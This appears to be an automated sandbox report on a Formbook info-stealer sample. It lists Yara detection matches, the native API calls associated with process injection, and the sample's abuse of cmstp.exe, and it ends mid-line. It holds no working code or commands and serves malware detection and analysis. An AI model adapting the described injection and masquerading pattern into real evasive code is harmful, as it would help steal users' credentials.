Source: Yara match | File source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_004181C0 NtCreateFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00418270 NtReadFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_004182F0 NtClose,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_004183A0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00418272 NtReadFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00ABB040 NtSuspendThread,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9A10 NtQuerySection,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00ABA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00ABAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9560 NtWriteFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB96D0 NtCreateKey,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00ABA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9760 NtOpenProcess,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00AB9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_2_00ABA770 NtOpenThread,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_1_004181C0 NtCreateFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_1_00418270 NtReadFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_1_004182F0 NtClose,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_1_004183A0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 1_1_00418272 NtReadFile,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046295D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046296E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046296D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046299A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629560 NtWriteFile,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0462AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046295F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629760 NtOpenProcess,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0462A770 NtOpenThread,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0462A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046297A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0462B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046298F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046298A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046299D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629A20 NtResumeThread,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629A10 NtQuerySection,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04629B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0462A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_004181C0 NtCreateFile,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_00418270 NtReadFile,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_004182F0 NtClose,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_004183A0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_00418272 NtReadFile,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: String function: 00419F70 appears 36 times
Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: String function: 00A7B150 appears 45 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 045EB150 appears 48 times
Source: TazxfJHRhq.exe, 00000000.00000003.211457812.000000001F016000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TazxfJHRhq.exe
Source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameCMSTP.EXE` vs TazxfJHRhq.exe
Source: TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TazxfJHRhq.exe
Source: TazxfJHRhq.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signat